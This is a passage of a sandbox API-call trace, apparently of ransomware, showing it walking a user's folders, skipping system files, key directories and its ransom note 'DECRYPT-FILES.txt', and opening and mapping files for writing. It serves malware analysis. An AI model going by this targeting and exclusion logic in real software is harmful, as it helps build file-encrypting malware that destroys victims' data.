ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac6f010, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac6f010, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa21, dwReserved0=0x0, dwReserved1=0x0, cFileName="94tBqj 9I.lnk", cAlternateFileName="94TBQJ~1.LNK")) returned 1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="autorun.inf") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="boot.ini") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="desktop.ini") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="ntuser.dat") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="iconcache.db") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="bootsect.bak") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="ntuser.dat.log") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="thumbs.db") returned -1 [0182.196] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="Bootfont.bin") returned -1 [0182.196] lstrlenW (lpString="94tBqj 9I.lnk") returned 13 [0182.196] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.196] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b04d3d0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b04d3d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b04d3d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="9hYC b9 OAgc.lnk", cAlternateFileName="9HYCB9~1.LNK")) returned 1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="autorun.inf") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="boot.ini") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="desktop.ini") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="ntuser.dat") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="iconcache.db") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="bootsect.bak") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="ntuser.dat.log") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="thumbs.db") returned -1 [0182.196] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="Bootfont.bin") returned -1 [0182.196] lstrlenW (lpString="9hYC b9 OAgc.lnk") returned 16 [0182.196] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.196] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac6f010, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac6f010, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac6f010, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xed2, dwReserved0=0x0, dwReserved1=0x0, cFileName="9MoUg27.lnk", cAlternateFileName="")) returned 1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="autorun.inf") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="boot.ini") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="desktop.ini") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="ntuser.dat") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="iconcache.db") returned -1 [0182.196] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="bootsect.bak") returned -1 [0182.197] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="ntuser.dat.log") returned -1 [0182.197] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="thumbs.db") returned -1 [0182.197] lstrcmpiW (lpString1="9MoUg27.lnk", lpString2="Bootfont.bin") returned -1 [0182.197] lstrlenW (lpString="9MoUg27.lnk") returned 11 [0182.197] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.197] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac22d50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac22d50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac22d50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf65, dwReserved0=0x0, dwReserved1=0x0, cFileName="a05Mw73tf.lnk", cAlternateFileName="A05MW7~1.LNK")) returned 1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="autorun.inf") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="boot.ini") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="desktop.ini") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="ntuser.dat") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="iconcache.db") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="bootsect.bak") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="ntuser.dat.log") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="thumbs.db") returned -1 [0182.197] lstrcmpiW (lpString1="a05Mw73tf.lnk", lpString2="Bootfont.bin") returned -1 [0182.197] lstrlenW (lpString="a05Mw73tf.lnk") returned 13 [0182.197] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.197] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad2d6f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ad2d6f0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ad2d6f0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1580, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcdcPPw5PxakniwP.lnk", cAlternateFileName="ACDCPP~1.LNK")) returned 1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="autorun.inf") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="boot.ini") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="desktop.ini") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="ntuser.dat") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="iconcache.db") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="bootsect.bak") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="ntuser.dat.log") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="thumbs.db") returned -1 [0182.197] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.lnk", lpString2="Bootfont.bin") returned -1 [0182.197] lstrlenW (lpString="AcdcPPw5PxakniwP.lnk") returned 20 [0182.197] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.197] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab3e510, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ab3e510, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ab3e510, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ajTbqxKluAP5yMsiQz.mkv.lnk", cAlternateFileName="AJTBQX~1.LNK")) returned 1 [0182.197] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.197] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="autorun.inf") returned -1 [0182.197] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="boot.ini") returned -1 [0182.198] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="desktop.ini") returned -1 [0182.198] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="ntuser.dat") returned -1 [0182.198] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="iconcache.db") returned -1 [0182.198] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.lnk", lpString2="bootsect.bak") returned -1 [0182.200] lstrcatW (in: lpString1="AutomaticDestinations", lpString2="\\" | out: lpString1="AutomaticDestinations\\") returned="AutomaticDestinations\\" [0182.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Program Files") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch=":\\Windows") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Games\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\All Users") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="AhnLab") returned 0x0 [0182.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.201] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.201] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\0a16c9.tmp") returned 104 [0182.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0182.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.203] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.203] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt") returned 111 [0182.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.203] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0182.203] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefa07920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa07920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0182.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.204] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefa07920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa07920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.204] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.204] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa07920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefa07920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa07920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.204] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.204] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.204] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.204] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.204] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.204] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.204] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.204] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0182.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\0a16c9.tmp" [0182.204] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.205] CloseHandle (hObject=0x0) returned 0 [0182.205] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.205] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x145c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", cAlternateFileName="1B4DD6~1.9EG")) returned 1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="DECRYPT-FILES.txt") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="autorun.inf") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="boot.ini") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="desktop.ini") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="ntuser.dat") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="iconcache.db") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="bootsect.bak") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="ntuser.dat.log") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="thumbs.db") returned -1 [0182.205] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW", lpString2="Bootfont.bin") returned -1 [0182.205] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW") returned 48 [0182.205] lstrcmpiW (lpString1="9EgtdW", lpString2="lnk") returned -1 [0182.205] lstrcmpiW (lpString1="9EgtdW", lpString2="exe") returned -1 [0182.205] lstrcmpiW (lpString1="9EgtdW", lpString2="sys") returned -1 [0182.205] lstrcmpiW (lpString1="9EgtdW", lpString2="dll") returned -1 [0182.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.205] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW") returned 48 [0182.205] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0182.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW" [0182.205] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.9egtdw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.206] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=83398) returned 1 [0182.206] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.206] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.208] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.209] CloseHandle (hObject=0x288) returned 1 [0182.209] CloseHandle (hObject=0x284) returned 1 [0182.209] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.209] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc606a140, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc606a140, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xabe87980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", cAlternateFileName="7E4DCA~1.QCI")) returned 1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="DECRYPT-FILES.txt") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="autorun.inf") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="boot.ini") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="desktop.ini") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="ntuser.dat") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="iconcache.db") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="bootsect.bak") returned -1 [0182.209] lstrcmpiW 